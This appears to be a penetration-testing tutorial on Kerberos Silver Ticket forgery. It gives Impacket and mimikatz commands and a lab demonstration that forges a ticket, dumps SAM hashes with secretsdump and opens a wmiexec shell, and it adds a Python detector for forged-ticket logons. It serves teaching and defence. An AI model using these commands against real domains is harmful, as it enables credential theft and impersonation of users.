1. Silver Ticket

1. Theory

The long-term key of a service account can be used to forge a service ticket, which can then be combined with Pass-the-ticket to access that service. In a Silver Ticket attack scenario, the attacker forges a service ticket whose PAC (Privilege Attribute Certificate) contains arbitrary information about the requesting user, thereby obtaining broad access.

A Silver Ticket forges a TGS using the corresponding service account, e.g. LDAP, MSSQL, WinRM, DNS, CIFS, etc. Its scope is limited: it only grants privileges on the corresponding service.

2. Usage

Requirements

  • The domain SID
  • The service account's key

When forging a ticket, before November 2021 the user name basically did not matter as long as the user-id and group-id were plausible. Since the November 2021 update, however, if the user name in the ticket does not exist in Active Directory, the ticket is rejected (this applies to silver tickets as well).

To create a silver ticket, the tester needs the target service account's RC4 key (i.e. the NT hash) or AES key (128 or 256 bit). This can be obtained by capturing an NTLM response (preferably NTLMv1) and cracking it, dumping LSA secrets, DCSync, and so on.

"Although the scope of a silver ticket attack is more limited than that of a golden ticket, the required hash is easier to obtain, and no communication with the domain controller is needed when using it, so it is harder to detect than a golden ticket." https://adsecurity.org/?p=2011

2.1. Linux

On Linux, use ticketer from Impacket to forge the ticket.

# Look up the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController'

# Generate a silver ticket with the NT hash
python ticketer.py -nthash "$NT_HASH" -domain-sid "$DomainSID" -domain "$DOMAIN" -spn "$SPN" "username"

# Generate a silver ticket with an AES (128- or 256-bit) key
python ticketer.py -aesKey "$AESkey" -domain-sid "$DomainSID" -domain "$DOMAIN" -spn "$SPN" "username"

The SPN (Service Principal Name) determines which services the ticket can reach. For example, cifs/target.domain and host/target.domain allow most remote dumping operations (see adsecurity.org for more details).

2.2. Windows

On Windows, mimikatz's kerberos::golden command can generate a silver ticket. The tester needs to carefully choose the correct SPN type (cifs, http, ldap, host, rpcss, etc.) according to the intended use.

# Generate a silver ticket with the NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$serviceAccount_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

# Generate a silver ticket with an AES 128-bit key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$serviceAccount_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

# Generate a silver ticket with an AES 256-bit key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$serviceAccount_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

2.3. Other notes

Compared with a Silver Ticket, a better and stealthier alternative is to abuse S4U2self. This approach relies on Kerberos delegation rather than on forging a ticket to impersonate a domain user who has local administrator privileges on the target machine.

  • A Silver Ticket relies on the service account's password hash, unlike a Golden Ticket, which requires the krbtgt account's password hash; this makes it stealthier.
  • A Golden Ticket is encrypted with the krbtgt account's key, whereas a Silver Ticket is encrypted with the key of a specific service account.
  • A Silver Ticket does not require any interaction with the KDC, but the price is that the service's NTLM hash is needed to forge it.
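Because a silver ticket is presented directly to the service and is never issued by the KDC (the point made in the adsecurity.org quote above and in the last bullet), a defender can correlate Kerberos network logons (event 4624) on a member server with TGS requests (event 4769) on the domain controller: a Kerberos logon with no TGS request behind it is the gap a forged ticket leaves. The Python example below is added here and is not part of the original page; it runs that correlation over constructed sample events and also flags the FQDN-style "Account Domain" value that adsecurity.org lists as a forged-ticket indicator. Event field names, timestamps and the 192.168.3.200 address are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names loosely mirror the
# Windows Security log. The "silver" logon below has no 4769 on the DC and
# carries the FQDN in the domain field, as a ticketer/mimikatz ticket would.
DC_4769 = [  # TGS requests recorded on the domain controller
    {"time": "2024-05-01T10:00:05", "user": "jdoe", "ip": "192.168.3.50"},
]
SERVER_4624 = [  # network logons recorded on the member server
    {"time": "2024-05-01T10:00:07", "user": "jdoe", "domain": "0DAY",
     "logon_type": 3, "auth": "Kerberos", "ip": "192.168.3.50"},
    {"time": "2024-05-01T10:12:00", "user": "silver", "domain": "0day.org",
     "logon_type": 3, "auth": "Kerberos", "ip": "192.168.3.200"},
]


def _ts(s):
    return datetime.fromisoformat(s)


def find_suspect_logons(server_events, dc_events, window_hours=10):
    """Return Kerberos network logons that lack a preceding 4769 on the DC.

    A legitimate service ticket is reusable for its whole lifetime (10 h by
    default), so a 4769 anywhere in the window before the logon counts as a
    match. The domain check flags an FQDN where the NetBIOS name is expected.
    Assumes 4769 auditing is enabled and dc_events covers the whole window.
    """
    window = timedelta(hours=window_hours)
    suspects = []
    for ev in server_events:
        if ev["auth"] != "Kerberos" or ev["logon_type"] != 3:
            continue
        t = _ts(ev["time"])
        reasons = []
        has_tgs = any(
            d["user"].lower() == ev["user"].lower()
            and t - window <= _ts(d["time"]) <= t
            for d in dc_events
        )
        if not has_tgs:
            reasons.append("no_matching_tgs_request")
        if "." in ev["domain"]:
            reasons.append("fqdn_account_domain")
        if reasons:
            suspects.append({"user": ev["user"], "ip": ev["ip"], "reasons": reasons})
    return suspects


if __name__ == "__main__":
    for s in find_suspect_logons(SERVER_4624, DC_4769):
        print(s)
```

A single unmatched logon is a lead rather than proof, since 4769 coverage gaps (clock skew, log loss, a TGS obtained from another DC) produce the same signature; the FQDN domain field narrows it considerably.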

2.4. Demonstration

Silver ticket

# Look up the domain SID
┌──(root㉿kali)-[~/tmp]
└─# impacket-lookupsid -hashes :38fe728ae616f0fde13715e7c320685f  0day.org/administrator@192.168.3.142
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 192.168.3.142
[*] StringBinding ncacn_np:192.168.3.142[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1812960810-2335050734-3517558805
498: 0DAY\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: 0DAY\Administrator (SidTypeUser)
501: 0DAY\Guest (SidTypeUser)
502: 0DAY\krbtgt (SidTypeUser)
512: 0DAY\Domain Admins (SidTypeGroup)

# Generate a silver ticket with the NT hash
┌──(root㉿kali)-[~/tmp]
└─# impacket-ticketer -nthash ed8136d84965a7958c2e4e0d84bf34b7 -domain-sid S-1-5-21-1812960810-2335050734-3517558805 -domain 0day.org -dc-ip 192.168.3.144 -spn cifs/OWA2010SP3.0day.org silver
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
/usr/share/doc/python3-impacket/examples/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for 0day.org/silver
/usr/share/doc/python3-impacket/examples/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/usr/share/doc/python3-impacket/examples/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/share/doc/python3-impacket/examples/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
/usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in silver.ccache

# Import the ticket
┌──(root㉿kali)-[~/tmp]
└─# export KRB5CCNAME=silver.ccache

# Use the ticket to run dcsync
┌──(root㉿kali)-[~/tmp]
└─# impacket-secretsdump   -k OWA2010SP3.0day.org
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xe2daa1c5dca47d980c9c9a95b0409760
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

# Use the ticket for PTH
┌──(root㉿kali)-[~/tmp]
└─# impacket-wmiexec -k OWA2010SP3.0day.org -codec gbk
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
0day.org\silver